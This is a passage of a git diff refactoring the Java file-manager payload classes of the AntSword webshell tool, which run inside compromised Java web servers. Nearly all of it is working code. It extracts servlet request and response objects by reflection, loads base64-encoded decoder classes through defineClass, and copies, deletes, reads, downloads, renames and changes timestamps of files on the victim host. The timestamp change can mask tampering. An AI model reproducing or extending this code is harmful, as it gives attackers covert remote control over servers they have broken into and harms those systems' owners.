clazz.getDeclaredMethod("getRequest").invoke(obj); - response = (HttpServletResponse) clazz.getDeclaredMethod("getResponse").invoke(obj); - } catch (Exception e) { - if (obj instanceof HttpServletRequest) { - request = (HttpServletRequest) obj; - try { - Field req = request.getClass().getDeclaredField("request"); - req.setAccessible(true); - HttpServletRequest request2 = (HttpServletRequest) req.get(request); - Field resp = request2.getClass().getDeclaredField("response"); - resp.setAccessible(true); - response = (HttpServletResponse) resp.get(request2); - } catch (Exception ex) { - try { - response = (HttpServletResponse) request.getClass().getDeclaredMethod("getResponse").invoke(obj); - } catch (Exception ignored) { - - } - } - } - } - randomPrefix = "antswordrandomPrefix"; - encoder = "base64"; - cs = "antswordCharset"; - StringBuffer output = new StringBuffer(""); + this.parseObj(obj); + StringBuffer output = new StringBuffer(); String tag_s = "->|"; String tag_e = "|<-"; String varkey1 = "antswordargpath"; @@ -117,10 +92,42 @@ String ChmodCode(String path, String permstr) { return "1"; } + public void parseObj(Object obj) { + if (obj.getClass().isArray()) { + Object[] data = (Object[]) obj; + request = (HttpServletRequest) data[0]; + response = (HttpServletResponse) data[1]; + } else { + try { + Class clazz = Class.forName("javax.servlet.jsp.PageContext"); + request = (HttpServletRequest) clazz.getDeclaredMethod("getRequest").invoke(obj); + response = (HttpServletResponse) clazz.getDeclaredMethod("getResponse").invoke(obj); + } catch (Exception e) { + if (obj instanceof HttpServletRequest) { + request = (HttpServletRequest) obj; + try { + Field req = request.getClass().getDeclaredField("request"); + req.setAccessible(true); + HttpServletRequest request2 = (HttpServletRequest) req.get(request); + Field resp = request2.getClass().getDeclaredField("response"); + resp.setAccessible(true); + response = (HttpServletResponse) resp.get(request2); + } catch (Exception ex) { + try { + response = (HttpServletResponse) request.getClass().getDeclaredMethod("getResponse").invoke(obj); + } catch (Exception ignored) { + + } + } + } + } + } + } + public String asoutput(String str) { try { byte[] classBytes = Base64DecodeToByte(decoderClassdata); - java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", new Class[]{byte[].class, int.class, int.class}); + java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class); defineClassMethod.setAccessible(true); Class cc = (Class) defineClassMethod.invoke(this.getClass().getClassLoader(), classBytes, 0, classBytes.length); return cc.getConstructor(String.class).newInstance(str).toString(); diff --git a/src/filemanager/Copy.java b/src/filemanager/Copy.java index 1e63216..af07dfb 100644 --- a/src/filemanager/Copy.java +++ b/src/filemanager/Copy.java @@ -10,40 +10,15 @@ public class Copy { public HttpServletRequest request = null; public HttpServletResponse response = null; - public String encoder; - public String cs; - public String randomPrefix; + public String encoder = "base64"; + public String cs = "antswordCharset"; + public String randomPrefix = "antswordrandomPrefix"; public String decoderClassdata; @Override public boolean equals(Object obj) { - try { - Class clazz = Class.forName("javax.servlet.jsp.PageContext"); - request = (HttpServletRequest) clazz.getDeclaredMethod("getRequest").invoke(obj); - response = (HttpServletResponse) clazz.getDeclaredMethod("getResponse").invoke(obj); - } catch (Exception e) { - if (obj instanceof HttpServletRequest) { - request = (HttpServletRequest) obj; - try { - Field req = request.getClass().getDeclaredField("request"); - req.setAccessible(true); - HttpServletRequest request2 = (HttpServletRequest) req.get(request); - Field resp = request2.getClass().getDeclaredField("response"); - resp.setAccessible(true); - response = (HttpServletResponse) resp.get(request2); - } catch (Exception ex) { - try { - response = (HttpServletResponse) request.getClass().getDeclaredMethod("getResponse").invoke(obj); - } catch (Exception ignored) { - - } - } - } - } - randomPrefix = "antswordrandomPrefix"; - encoder = "base64"; - cs = "antswordCharset"; - StringBuffer output = new StringBuffer(""); + this.parseObj(obj); + StringBuffer output = new StringBuffer(); String tag_s = "->|"; String tag_e = "|<-"; String varkey1 = "antswordargpath"; @@ -88,7 +63,7 @@ String CopyFileOrDirCode(String sourceFilePath, String targetFilePath) throws Ex if (!df.exists()) { df.mkdir(); } - File z[] = sf.listFiles(); + File[] z = sf.listFiles(); for (int j = 0; j < z.length; j++) { CopyFileOrDirCode(sourceFilePath + "/" + z[j].getName(), targetFilePath + "/" + z[j].getName()); } @@ -106,10 +81,42 @@ String CopyFileOrDirCode(String sourceFilePath, String targetFilePath) throws Ex return "1"; } + public void parseObj(Object obj) { + if (obj.getClass().isArray()) { + Object[] data = (Object[]) obj; + request = (HttpServletRequest) data[0]; + response = (HttpServletResponse) data[1]; + } else { + try { + Class clazz = Class.forName("javax.servlet.jsp.PageContext"); + request = (HttpServletRequest) clazz.getDeclaredMethod("getRequest").invoke(obj); + response = (HttpServletResponse) clazz.getDeclaredMethod("getResponse").invoke(obj); + } catch (Exception e) { + if (obj instanceof HttpServletRequest) { + request = (HttpServletRequest) obj; + try { + Field req = request.getClass().getDeclaredField("request"); + req.setAccessible(true); + HttpServletRequest request2 = (HttpServletRequest) req.get(request); + Field resp = request2.getClass().getDeclaredField("response"); + resp.setAccessible(true); + response = (HttpServletResponse) resp.get(request2); + } catch (Exception ex) { + try { + response = (HttpServletResponse) request.getClass().getDeclaredMethod("getResponse").invoke(obj); + } catch (Exception ignored) { + + } + } + } + } + } + } + public String asoutput(String str) { try { byte[] classBytes = Base64DecodeToByte(decoderClassdata); - java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", new Class[]{byte[].class, int.class, int.class}); + java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class); defineClassMethod.setAccessible(true); Class cc = (Class) defineClassMethod.invoke(this.getClass().getClassLoader(), classBytes, 0, classBytes.length); return cc.getConstructor(String.class).newInstance(str).toString(); diff --git a/src/filemanager/Create_file.java b/src/filemanager/Create_file.java index aee4aa9..616f2b1 100644 --- a/src/filemanager/Create_file.java +++ b/src/filemanager/Create_file.java @@ -9,40 +9,15 @@ public class Create_file { public HttpServletRequest request = null; public HttpServletResponse response = null; - public String encoder; - public String cs; - public String randomPrefix; + public String encoder = "base64"; + public String cs = "antswordCharset"; + public String randomPrefix = "antswordrandomPrefix"; public String decoderClassdata; @Override public boolean equals(Object obj) { - try { - Class clazz = Class.forName("javax.servlet.jsp.PageContext"); - request = (HttpServletRequest) clazz.getDeclaredMethod("getRequest").invoke(obj); - response = (HttpServletResponse) clazz.getDeclaredMethod("getResponse").invoke(obj); - } catch (Exception e) { - if (obj instanceof HttpServletRequest) { - request = (HttpServletRequest) obj; - try { - Field req = request.getClass().getDeclaredField("request"); - req.setAccessible(true); - HttpServletRequest request2 = (HttpServletRequest) req.get(request); - Field resp = request2.getClass().getDeclaredField("response"); - resp.setAccessible(true); - response = (HttpServletResponse) resp.get(request2); - } catch (Exception ex) { - try { - response = (HttpServletResponse) request.getClass().getDeclaredMethod("getResponse").invoke(obj); - } catch (Exception ignored) { - - } - } - } - } - randomPrefix = "antswordrandomPrefix"; - encoder = "base64"; - cs = "antswordCharset"; - StringBuffer output = new StringBuffer(""); + this.parseObj(obj); + StringBuffer output = new StringBuffer(); String tag_s = "->|"; String tag_e = "|<-"; String varkey1 = "antswordargpath"; @@ -104,10 +79,42 @@ String strtohexstr(String fileContext) throws Exception { return sb.toString(); } + public void parseObj(Object obj) { + if (obj.getClass().isArray()) { + Object[] data = (Object[]) obj; + request = (HttpServletRequest) data[0]; + response = (HttpServletResponse) data[1]; + } else { + try { + Class clazz = Class.forName("javax.servlet.jsp.PageContext"); + request = (HttpServletRequest) clazz.getDeclaredMethod("getRequest").invoke(obj); + response = (HttpServletResponse) clazz.getDeclaredMethod("getResponse").invoke(obj); + } catch (Exception e) { + if (obj instanceof HttpServletRequest) { + request = (HttpServletRequest) obj; + try { + Field req = request.getClass().getDeclaredField("request"); + req.setAccessible(true); + HttpServletRequest request2 = (HttpServletRequest) req.get(request); + Field resp = request2.getClass().getDeclaredField("response"); + resp.setAccessible(true); + response = (HttpServletResponse) resp.get(request2); + } catch (Exception ex) { + try { + response = (HttpServletResponse) request.getClass().getDeclaredMethod("getResponse").invoke(obj); + } catch (Exception ignored) { + + } + } + } + } + } + } + public String asoutput(String str) { try { byte[] classBytes = Base64DecodeToByte(decoderClassdata); - java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", new Class[]{byte[].class, int.class, int.class}); + java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class); defineClassMethod.setAccessible(true); Class cc = (Class) defineClassMethod.invoke(this.getClass().getClassLoader(), classBytes, 0, classBytes.length); return cc.getConstructor(String.class).newInstance(str).toString(); diff --git a/src/filemanager/Delete.java b/src/filemanager/Delete.java index 8b5a8cd..c4a7c14 100644 --- a/src/filemanager/Delete.java +++ b/src/filemanager/Delete.java @@ -8,40 +8,15 @@ public class Delete { public HttpServletRequest request = null; public HttpServletResponse response = null; - public String encoder; - public String cs; - public String randomPrefix; + public String encoder = "base64"; + public String cs = "antswordCharset"; + public String randomPrefix = "antswordrandomPrefix"; public String decoderClassdata; @Override public boolean equals(Object obj) { - try { - Class clazz = Class.forName("javax.servlet.jsp.PageContext"); - request = (HttpServletRequest) clazz.getDeclaredMethod("getRequest").invoke(obj); - response = (HttpServletResponse) clazz.getDeclaredMethod("getResponse").invoke(obj); - } catch (Exception e) { - if (obj instanceof HttpServletRequest) { - request = (HttpServletRequest) obj; - try { - Field req = request.getClass().getDeclaredField("request"); - req.setAccessible(true); - HttpServletRequest request2 = (HttpServletRequest) req.get(request); - Field resp = request2.getClass().getDeclaredField("response"); - resp.setAccessible(true); - response = (HttpServletResponse) resp.get(request2); - } catch (Exception ex) { - try { - response = (HttpServletResponse) request.getClass().getDeclaredMethod("getResponse").invoke(obj); - } catch (Exception ignored) { - - } - } - } - } - randomPrefix = "antswordrandomPrefix"; - encoder = "base64"; - cs = "antswordCharset"; - StringBuffer output = new StringBuffer(""); + this.parseObj(obj); + StringBuffer output = new StringBuffer(); String tag_s = "->|"; String tag_e = "|<-"; String varkey1 = "antswordargpath"; @@ -81,7 +56,7 @@ String decode(String str) throws Exception { String DeleteFileOrDirCode(String fileOrDirPath) throws Exception { File f = new File(fileOrDirPath); if (f.isDirectory()) { - File x[] = f.listFiles(); + File[] x = f.listFiles(); for (int k = 0; k < x.length; k++) { if (!x[k].delete()) { DeleteFileOrDirCode(x[k].getPath()); @@ -92,10 +67,42 @@ String DeleteFileOrDirCode(String fileOrDirPath) throws Exception { return "1"; } + public void parseObj(Object obj) { + if (obj.getClass().isArray()) { + Object[] data = (Object[]) obj; + request = (HttpServletRequest) data[0]; + response = (HttpServletResponse) data[1]; + } else { + try { + Class clazz = Class.forName("javax.servlet.jsp.PageContext"); + request = (HttpServletRequest) clazz.getDeclaredMethod("getRequest").invoke(obj); + response = (HttpServletResponse) clazz.getDeclaredMethod("getResponse").invoke(obj); + } catch (Exception e) { + if (obj instanceof HttpServletRequest) { + request = (HttpServletRequest) obj; + try { + Field req = request.getClass().getDeclaredField("request"); + req.setAccessible(true); + HttpServletRequest request2 = (HttpServletRequest) req.get(request); + Field resp = request2.getClass().getDeclaredField("response"); + resp.setAccessible(true); + response = (HttpServletResponse) resp.get(request2); + } catch (Exception ex) { + try { + response = (HttpServletResponse) request.getClass().getDeclaredMethod("getResponse").invoke(obj); + } catch (Exception ignored) { + + } + } + } + } + } + } + public String asoutput(String str) { try { byte[] classBytes = Base64DecodeToByte(decoderClassdata); - java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", new Class[]{byte[].class, int.class, int.class}); + java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class); defineClassMethod.setAccessible(true); Class cc = (Class) defineClassMethod.invoke(this.getClass().getClassLoader(), classBytes, 0, classBytes.length); return cc.getConstructor(String.class).newInstance(str).toString(); diff --git a/src/filemanager/Dir.java b/src/filemanager/Dir.java index d5e89ec..08176e2 100644 --- a/src/filemanager/Dir.java +++ b/src/filemanager/Dir.java @@ -1,7 +1,5 @@ package filemanager; -import com.sun.org.apache.xpath.internal.operations.Bool; - import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; import java.io.File; @@ -13,40 +11,16 @@ public class Dir { public HttpServletRequest request = null; public HttpServletResponse response = null; - public String encoder; - public String cs; - public String randomPrefix; + public String encoder = "base64"; + public String cs = "antswordCharset"; + public String randomPrefix = "antswordrandomPrefix"; public String decoderClassdata; @Override public boolean equals(Object obj) { - try { - Class clazz = Class.forName("javax.servlet.jsp.PageContext"); - request = (HttpServletRequest) clazz.getDeclaredMethod("getRequest").invoke(obj); - response = (HttpServletResponse) clazz.getDeclaredMethod("getResponse").invoke(obj); - } catch (Exception e) { - if (obj instanceof HttpServletRequest) { - request = (HttpServletRequest) obj; - try { - Field req = request.getClass().getDeclaredField("request"); - req.setAccessible(true); - HttpServletRequest request2 = (HttpServletRequest) req.get(request); - Field resp = request2.getClass().getDeclaredField("response"); - resp.setAccessible(true); - response = (HttpServletResponse) resp.get(request2); - } catch (Exception ex) { - try { - response = (HttpServletResponse) request.getClass().getDeclaredMethod("getResponse").invoke(obj); - } catch (Exception ignored) { - - } - } - } - } - randomPrefix = "antswordrandomPrefix"; - encoder = "base64"; + this.parseObj(obj); cs = String.valueOf(Charset.forName(System.getProperty("sun.jnu.encoding"))); - StringBuffer output = new StringBuffer(""); + StringBuffer output = new StringBuffer(); String tag_s = "->|"; String tag_e = "|<-"; String varkey1 = "antswordargpath"; @@ -96,8 +70,8 @@ public String FileTreeCode(String dirPath) throws Exception { sQ = l[i].canRead() ? "R" : "-"; sQ += l[i].canWrite() ? "W" : "-"; try { - sQ += ((Boolean) l[i].getClass().getMethod("canExecute").invoke(l[i])) ? "X" : "-"; - }catch (Exception e) { + sQ += ((Boolean) l[i].getClass().getMethod("canExecute").invoke(l[i])) ? "X" : "-"; + } catch (Exception e) { sQ += "-"; } String nm = l[i].getName(); @@ -111,10 +85,42 @@ public String FileTreeCode(String dirPath) throws Exception { return s; } + public void parseObj(Object obj) { + if (obj.getClass().isArray()) { + Object[] data = (Object[]) obj; + request = (HttpServletRequest) data[0]; + response = (HttpServletResponse) data[1]; + } else { + try { + Class clazz = Class.forName("javax.servlet.jsp.PageContext"); + request = (HttpServletRequest) clazz.getDeclaredMethod("getRequest").invoke(obj); + response = (HttpServletResponse) clazz.getDeclaredMethod("getResponse").invoke(obj); + } catch (Exception e) { + if (obj instanceof HttpServletRequest) { + request = (HttpServletRequest) obj; + try { + Field req = request.getClass().getDeclaredField("request"); + req.setAccessible(true); + HttpServletRequest request2 = (HttpServletRequest) req.get(request); + Field resp = request2.getClass().getDeclaredField("response"); + resp.setAccessible(true); + response = (HttpServletResponse) resp.get(request2); + } catch (Exception ex) { + try { + response = (HttpServletResponse) request.getClass().getDeclaredMethod("getResponse").invoke(obj); + } catch (Exception ignored) { + + } + } + } + } + } + } + public String asoutput(String str) { try { byte[] classBytes = Base64DecodeToByte(decoderClassdata); - java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", new Class[]{byte[].class, int.class, int.class}); + java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class); defineClassMethod.setAccessible(true); Class cc = (Class) defineClassMethod.invoke(this.getClass().getClassLoader(), classBytes, 0, classBytes.length); return cc.getConstructor(String.class).newInstance(str).toString(); diff --git a/src/filemanager/Download_file.java b/src/filemanager/Download_file.java index a1e11d2..43201aa 100644 --- a/src/filemanager/Download_file.java +++ b/src/filemanager/Download_file.java @@ -3,51 +3,23 @@ import javax.servlet.ServletOutputStream; import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; -import javax.servlet.jsp.PageContext; import java.io.BufferedInputStream; -import java.io.ByteArrayOutputStream; import java.io.FileInputStream; import java.lang.reflect.Field; public class Download_file { public HttpServletRequest request = null; public HttpServletResponse response = null; - public String encoder; - public String cs; - public String randomPrefix; + public String encoder = "base64"; + public String cs = "antswordCharset"; + public String randomPrefix = "antswordrandomPrefix"; public String tag_s; public String tag_e; @Override public boolean equals(Object obj) { - try { - Class clazz = Class.forName("javax.servlet.jsp.PageContext"); - request = (HttpServletRequest) clazz.getDeclaredMethod("getRequest").invoke(obj); - response = (HttpServletResponse) clazz.getDeclaredMethod("getResponse").invoke(obj); - } catch (Exception e) { - if (obj instanceof HttpServletRequest) { - request = (HttpServletRequest) obj; - try { - Field req = request.getClass().getDeclaredField("request"); - req.setAccessible(true); - HttpServletRequest request2 = (HttpServletRequest) req.get(request); - Field resp = request2.getClass().getDeclaredField("response"); - resp.setAccessible(true); - response = (HttpServletResponse) resp.get(request2); - } catch (Exception ex) { - try { - response = (HttpServletResponse) request.getClass().getDeclaredMethod("getResponse").invoke(obj); - } catch (Exception ignored) { - - } - } - } - } - randomPrefix = "antswordrandomPrefix"; - encoder = "base64"; - cs = "antswordCharset"; - StringBuffer output = new StringBuffer(""); - + this.parseObj(obj); + StringBuffer output = new StringBuffer(); tag_s = "->|"; tag_e = "|<-"; String varkey1 = "antswordargpath"; @@ -67,6 +39,38 @@ public boolean equals(Object obj) { return true; } + public void parseObj(Object obj) { + if (obj.getClass().isArray()) { + Object[] data = (Object[]) obj; + request = (HttpServletRequest) data[0]; + response = (HttpServletResponse) data[1]; + } else { + try { + Class clazz = Class.forName("javax.servlet.jsp.PageContext"); + request = (HttpServletRequest) clazz.getDeclaredMethod("getRequest").invoke(obj); + response = (HttpServletResponse) clazz.getDeclaredMethod("getResponse").invoke(obj); + } catch (Exception e) { + if (obj instanceof HttpServletRequest) { + request = (HttpServletRequest) obj; + try { + Field req = request.getClass().getDeclaredField("request"); + req.setAccessible(true); + HttpServletRequest request2 = (HttpServletRequest) req.get(request); + Field resp = request2.getClass().getDeclaredField("response"); + resp.setAccessible(true); + response = (HttpServletResponse) resp.get(request2); + } catch (Exception ex) { + try { + response = (HttpServletResponse) request.getClass().getDeclaredMethod("getResponse").invoke(obj); + } catch (Exception ignored) { + + } + } + } + } + } + } + String decode(String str) throws Exception { int prefixlen = 0; try { diff --git a/src/filemanager/Mkdir.java b/src/filemanager/Mkdir.java index 6cf7a6b..e439cad 100644 --- a/src/filemanager/Mkdir.java +++ b/src/filemanager/Mkdir.java @@ -8,40 +8,15 @@ public class Mkdir { public HttpServletRequest request = null; public HttpServletResponse response = null; - public String encoder; - public String cs; - public String randomPrefix; + public String encoder = "base64"; + public String cs = "antswordCharset"; + public String randomPrefix = "antswordrandomPrefix"; public String decoderClassdata; @Override public boolean equals(Object obj) { - try { - Class clazz = Class.forName("javax.servlet.jsp.PageContext"); - request = (HttpServletRequest) clazz.getDeclaredMethod("getRequest").invoke(obj); - response = (HttpServletResponse) clazz.getDeclaredMethod("getResponse").invoke(obj); - } catch (Exception e) { - if (obj instanceof HttpServletRequest) { - request = (HttpServletRequest) obj; - try { - Field req = request.getClass().getDeclaredField("request"); - req.setAccessible(true); - HttpServletRequest request2 = (HttpServletRequest) req.get(request); - Field resp = request2.getClass().getDeclaredField("response"); - resp.setAccessible(true); - response = (HttpServletResponse) resp.get(request2); - } catch (Exception ex) { - try { - response = (HttpServletResponse) request.getClass().getDeclaredMethod("getResponse").invoke(obj); - } catch (Exception ignored) { - - } - } - } - } - randomPrefix = "antswordrandomPrefix"; - encoder = "base64"; - cs = "antswordCharset"; - StringBuffer output = new StringBuffer(""); + this.parseObj(obj); + StringBuffer output = new StringBuffer(); String tag_s = "->|"; String tag_e = "|<-"; String varkey1 = "antswordargpath"; @@ -84,10 +59,42 @@ String CreateDirCode(String dirPath) throws Exception { return "1"; } + public void parseObj(Object obj) { + if (obj.getClass().isArray()) { + Object[] data = (Object[]) obj; + request = (HttpServletRequest) data[0]; + response = (HttpServletResponse) data[1]; + } else { + try { + Class clazz = Class.forName("javax.servlet.jsp.PageContext"); + request = (HttpServletRequest) clazz.getDeclaredMethod("getRequest").invoke(obj); + response = (HttpServletResponse) clazz.getDeclaredMethod("getResponse").invoke(obj); + } catch (Exception e) { + if (obj instanceof HttpServletRequest) { + request = (HttpServletRequest) obj; + try { + Field req = request.getClass().getDeclaredField("request"); + req.setAccessible(true); + HttpServletRequest request2 = (HttpServletRequest) req.get(request); + Field resp = request2.getClass().getDeclaredField("response"); + resp.setAccessible(true); + response = (HttpServletResponse) resp.get(request2); + } catch (Exception ex) { + try { + response = (HttpServletResponse) request.getClass().getDeclaredMethod("getResponse").invoke(obj); + } catch (Exception ignored) { + + } + } + } + } + } + } + public String asoutput(String str) { try { byte[] classBytes = Base64DecodeToByte(decoderClassdata); - java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", new Class[]{byte[].class, int.class, int.class}); + java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class); defineClassMethod.setAccessible(true); Class cc = (Class) defineClassMethod.invoke(this.getClass().getClassLoader(), classBytes, 0, classBytes.length); return cc.getConstructor(String.class).newInstance(str).toString(); diff --git a/src/filemanager/Read_file.java b/src/filemanager/Read_file.java index 26cc9af..fbac880 100644 --- a/src/filemanager/Read_file.java +++ b/src/filemanager/Read_file.java @@ -3,48 +3,23 @@ import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; import java.io.BufferedReader; -import java.io.InputStreamReader; import java.io.File; import java.io.FileInputStream; +import java.io.InputStreamReader; import java.lang.reflect.Field; public class Read_file { public HttpServletRequest request = null; public HttpServletResponse response = null; - public String encoder; - public String cs; - public String randomPrefix; + public String encoder = "base64"; + public String cs = "antswordCharset"; + public String randomPrefix = "antswordrandomPrefix"; public String decoderClassdata; @Override public boolean equals(Object obj) { - try { - Class clazz = Class.forName("javax.servlet.jsp.PageContext"); - request = (HttpServletRequest) clazz.getDeclaredMethod("getRequest").invoke(obj); - response = (HttpServletResponse) clazz.getDeclaredMethod("getResponse").invoke(obj); - } catch (Exception e) { - if (obj instanceof HttpServletRequest) { - request = (HttpServletRequest) obj; - try { - Field req = request.getClass().getDeclaredField("request"); - req.setAccessible(true); - HttpServletRequest request2 = (HttpServletRequest) req.get(request); - Field resp = request2.getClass().getDeclaredField("response"); - resp.setAccessible(true); - response = (HttpServletResponse) resp.get(request2); - } catch (Exception ex) { - try { - response = (HttpServletResponse) request.getClass().getDeclaredMethod("getResponse").invoke(obj); - } catch (Exception ignored) { - - } - } - } - } - randomPrefix = "antswordrandomPrefix"; - encoder = "base64"; - cs = "antswordCharset"; - StringBuffer output = new StringBuffer(""); + this.parseObj(obj); + StringBuffer output = new StringBuffer(); String tag_s = "->|"; String tag_e = "|<-"; String varkey1 = "antswordargpath"; @@ -93,10 +68,42 @@ String ReadFileCode(String filePath) throws Exception { return s; } + public void parseObj(Object obj) { + if (obj.getClass().isArray()) { + Object[] data = (Object[]) obj; + request = (HttpServletRequest) data[0]; + response = (HttpServletResponse) data[1]; + } else { + try { + Class clazz = Class.forName("javax.servlet.jsp.PageContext"); + request = (HttpServletRequest) clazz.getDeclaredMethod("getRequest").invoke(obj); + response = (HttpServletResponse) clazz.getDeclaredMethod("getResponse").invoke(obj); + } catch (Exception e) { + if (obj instanceof HttpServletRequest) { + request = (HttpServletRequest) obj; + try { + Field req = request.getClass().getDeclaredField("request"); + req.setAccessible(true); + HttpServletRequest request2 = (HttpServletRequest) req.get(request); + Field resp = request2.getClass().getDeclaredField("response"); + resp.setAccessible(true); + response = (HttpServletResponse) resp.get(request2); + } catch (Exception ex) { + try { + response = (HttpServletResponse) request.getClass().getDeclaredMethod("getResponse").invoke(obj); + } catch (Exception ignored) { + + } + } + } + } + } + } + public String asoutput(String str) { try { byte[] classBytes = Base64DecodeToByte(decoderClassdata); - java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", new Class[]{byte[].class, int.class, int.class}); + java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class); defineClassMethod.setAccessible(true); Class cc = (Class) defineClassMethod.invoke(this.getClass().getClassLoader(), classBytes, 0, classBytes.length); return cc.getConstructor(String.class).newInstance(str).toString(); diff --git a/src/filemanager/Rename.java b/src/filemanager/Rename.java index a07a1ab..491f865 100644 --- a/src/filemanager/Rename.java +++ b/src/filemanager/Rename.java @@ -8,40 +8,15 @@ public class Rename { public HttpServletRequest request = null; public HttpServletResponse response = null; - public String encoder; - public String cs; - public String randomPrefix; + public String encoder = "base64"; + public String cs = "antswordCharset"; + public String randomPrefix = "antswordrandomPrefix"; public String decoderClassdata; @Override public boolean equals(Object obj) { - try { - Class clazz = Class.forName("javax.servlet.jsp.PageContext"); - request = (HttpServletRequest) clazz.getDeclaredMethod("getRequest").invoke(obj); - response = (HttpServletResponse) clazz.getDeclaredMethod("getResponse").invoke(obj); - } catch (Exception e) { - if (obj instanceof HttpServletRequest) { - request = (HttpServletRequest) obj; - try { - Field req = request.getClass().getDeclaredField("request"); - req.setAccessible(true); - HttpServletRequest request2 = (HttpServletRequest) req.get(request); - Field resp = request2.getClass().getDeclaredField("response"); - resp.setAccessible(true); - response = (HttpServletResponse) resp.get(request2); - } catch (Exception ex) { - try { - response = (HttpServletResponse) request.getClass().getDeclaredMethod("getResponse").invoke(obj); - } catch (Exception ignored) { - - } - } - } - } - randomPrefix = "antswordrandomPrefix"; - encoder = "base64"; - cs = "antswordCharset"; - StringBuffer output = new StringBuffer(""); + this.parseObj(obj); + StringBuffer output = new StringBuffer(); String tag_s = "->|"; String tag_e = "|<-"; String varkey1 = "antswordargpath"; @@ -86,10 +61,42 @@ String RenameFileOrDirCode(String oldName, String newName) throws Exception { return "1"; } + public void parseObj(Object obj) { + if (obj.getClass().isArray()) { + Object[] data = (Object[]) obj; + request = (HttpServletRequest) data[0]; + response = (HttpServletResponse) data[1]; + } else { + try { + Class clazz = Class.forName("javax.servlet.jsp.PageContext"); + request = (HttpServletRequest) clazz.getDeclaredMethod("getRequest").invoke(obj); + response = (HttpServletResponse) clazz.getDeclaredMethod("getResponse").invoke(obj); + } catch (Exception e) { + if (obj instanceof HttpServletRequest) { + request = (HttpServletRequest) obj; + try { + Field req = request.getClass().getDeclaredField("request"); + req.setAccessible(true); + HttpServletRequest request2 = (HttpServletRequest) req.get(request); + Field resp = request2.getClass().getDeclaredField("response"); + resp.setAccessible(true); + response = (HttpServletResponse) resp.get(request2); + } catch (Exception ex) { + try { + response = (HttpServletResponse) request.getClass().getDeclaredMethod("getResponse").invoke(obj); + } catch (Exception ignored) { + + } + } + } + } + } + } + public String asoutput(String str) { try { byte[] classBytes = Base64DecodeToByte(decoderClassdata); - java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", new Class[]{byte[].class, int.class, int.class}); + java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class); defineClassMethod.setAccessible(true); Class cc = (Class) defineClassMethod.invoke(this.getClass().getClassLoader(), classBytes, 0, classBytes.length); return cc.getConstructor(String.class).newInstance(str).toString(); diff --git a/src/filemanager/Retime.java b/src/filemanager/Retime.java index 0767554..244d80c 100644 --- a/src/filemanager/Retime.java +++ b/src/filemanager/Retime.java @@ -9,40 +9,15 @@ public class Retime { public HttpServletRequest request = null; public HttpServletResponse response = null; - public String encoder; - public String cs; - public String randomPrefix; + public String encoder = "base64"; + public String cs = "antswordCharset"; + public String randomPrefix = "antswordrandomPrefix"; public String decoderClassdata; @Override public boolean equals(Object obj) { - try { - Class clazz = Class.forName("javax.servlet.jsp.PageContext"); - request = (HttpServletRequest) clazz.getDeclaredMethod("getRequest").invoke(obj); - response = (HttpServletResponse) clazz.getDeclaredMethod("getResponse").invoke(obj); - } catch (Exception e) { - if (obj instanceof HttpServletRequest) { - request = (HttpServletRequest) obj; - try { - Field req = request.getClass().getDeclaredField("request"); - req.setAccessible(true); - HttpServletRequest request2 = (HttpServletRequest) req.get(request); - Field resp = request2.getClass().getDeclaredField("response"); - resp.setAccessible(true); - response = (HttpServletResponse) resp.get(request2); - } catch (Exception ex) { - try { - response = (HttpServletResponse) request.getClass().getDeclaredMethod("getResponse").invoke(obj); - } catch (Exception ignored) { - - } - } - } - } - randomPrefix = "antswordrandomPrefix"; - encoder = "base64"; - cs = "antswordCharset"; - StringBuffer output = new StringBuffer(""); + this.parseObj(obj); + StringBuffer output = new StringBuffer(); String tag_s = "->|"; String tag_e = "|<-"; String varkey1 = "antswordargpath"; @@ -89,10 +64,42 @@ String ModifyFileOrDirTimeCode(String fileOrDirPath, String aTime) throws Except return "1"; } + public void parseObj(Object obj) { + if (obj.getClass().isArray()) { + Object[] data = (Object[]) obj; + request = (HttpServletRequest) data[0]; + response = (HttpServletResponse) data[1]; + } else { + try { + Class clazz = Class.forName("javax.servlet.jsp.PageContext"); + request = (HttpServletRequest) clazz.getDeclaredMethod("getRequest").invoke(obj); + response = (HttpServletResponse) clazz.getDeclaredMethod("getResponse").invoke(obj); + } catch (Exception e) { + if (obj instanceof HttpServletRequest) { + request = (HttpServletRequest) obj; + try { + Field req = request.getClass().getDeclaredField("request"); + req.setAccessible(true); + HttpServletRequest request2 = (HttpServletRequest) req.get(request); + Field resp = request2.getClass().getDeclaredField("response"); + resp.setAccessible(true); + response = (HttpServletResponse) resp.get(request2); + } catch (Exception ex) { + try { + response = (HttpServletResponse) request.getClass().getDeclaredMethod("getResponse").invoke(obj); + } catch (Exception ignored) { + + } + } + } + } + } + } + public String asoutput(String str) { try { byte[] classBytes = Base64DecodeToByte(decoderClassdata); - java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", new Class[]{byte[].class, int.class, int.class}); + java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, 